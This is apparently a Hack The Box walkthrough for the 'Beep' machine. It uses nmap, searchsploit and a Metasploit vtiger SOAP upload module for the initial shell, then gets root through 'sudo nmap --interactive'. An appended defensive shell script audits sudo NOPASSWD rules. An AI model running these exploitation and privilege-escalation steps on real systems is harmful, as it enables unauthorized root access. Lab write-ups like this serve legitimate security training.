This is the second time I have hacked BEEP from HTB, but since I already did it without MSF, this time I will do it with MSF.

With NMAP we can see:

host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open   
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd

Dirbuster shows us vtiger.

If we search for vtiger in searchsploit:

root@Kali2:~/Downloads# searchsploit vtiger
------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                               	|  Path
                                                                                                                                             	| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Vtiger - 'Install' Remote Command Execution (Metasploit)                                                                                     	| exploits/php/remote/32794.rb
Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit)                                                                        	| exploits/php/webapps/44379.rb
Vtiger CRM 7.1.0 - Remote Code Execution                                                                                                     	| exploits/php/webapps/46065.py
vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions                                                                                   	| exploits/php/webapps/2508.txt
vTiger CRM 4.2 - SQL Injection                                                                                                               	| exploits/php/webapps/26586.txt
vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting                                                                                  	| exploits/php/webapps/26584.txt
vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting                                                                            	| exploits/php/webapps/26585.txt
vTiger CRM 5.0.4 - Local File Inclusion                                                                                                      	| exploits/php/webapps/16280.py
vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities                                                                             	| exploits/php/webapps/32307.txt
vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting                          	| exploits/php/webapps/9450.txt
vTiger CRM 5.1.0 - Local File Inclusion                                                                                                      	| exploits/php/webapps/18770.txt
vTiger CRM 5.2 - 'onlyforuser' SQL Injection                                                                                                 	| exploits/php/webapps/36208.txt
vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities                                                               	| exploits/php/webapps/36204.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)                                                             	| exploits/php/webapps/36203.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)                                                             	| exploits/php/webapps/36255.txt
vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion                                                                                 	| exploits/php/webapps/35574.txt
vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting                                                                                  	| exploits/php/webapps/35577.txt
vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit)                                                                  	| exploits/php/remote/29319.rb
vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection                                                                                     	| exploits/php/webapps/28409.txt
vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)                                                                	| exploits/php/remote/30787.rb
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities                                                                                             	| exploits/php/webapps/27279.txt
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion                                                                         	| exploits/php/webapps/32213.txt
vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution                                                                                     	| exploits/php/webapps/38345.txt
------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We can use the Metasploit module to get user:

use exploit/multi/http/vtiger_soap_upload
msf exploit(vtiger_soap_upload) > set SSL true
msf exploit(vtiger_soap_upload) > set RPORT 443

For manual privesc we can see that nmap can be run with sudo:

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

Running sudo nmap --interactive gets us root 🙂

sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
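As an added example (not part of the original write-up): a small POSIX sh audit of the `sudo -l` output above that flags NOPASSWD rules with no argument restriction for binaries that amount to root, nmap's interactive mode being the case this box demonstrates. The sample rules are a constructed subset of the list shown and the risk table is a constructed, non-exhaustive list.

```shell
#!/bin/sh
# Constructed sample taken from the sudo -l output above (one rule per line).
SUDO_RULES='(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service'

# Constructed, non-exhaustive table: binaries whose unrestricted NOPASSWD use
# is equivalent to root. nmap is the one this box shows (--interactive, !sh).
risk_reason() {
    case "$1" in
        nmap)        echo "interactive mode (--interactive) spawns a root shell" ;;
        chmod|chown) echo "can change permissions/ownership of any file as root" ;;
        *)           return 1 ;;
    esac
}

# Reads sudo rules on stdin; prints "binary<TAB>reason" for every risky
# NOPASSWD rule that carries no argument restriction.
audit_sudo_rules() {
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        cmd=${line#*NOPASSWD: }
        # Rules that pin arguments ("/usr/bin/nmap -sn") are skipped here.
        case "$cmd" in *\ *) continue ;; esac
        bin=${cmd##*/}
        if reason=$(risk_reason "$bin"); then
            printf '%s\t%s\n' "$bin" "$reason"
        fi
    done
}

# Number of risky rules in the sample (used for the self-check below).
risky_count() {
    printf '%s\n' "$SUDO_RULES" | audit_sudo_rules | wc -l | tr -d ' '
}

printf '%s\n' "$SUDO_RULES" | audit_sudo_rules
```

On a real host, feed `sudo -l` output through `audit_sudo_rules` instead of the sample; the fix for a flagged entry is to drop it from sudoers or restrict its arguments.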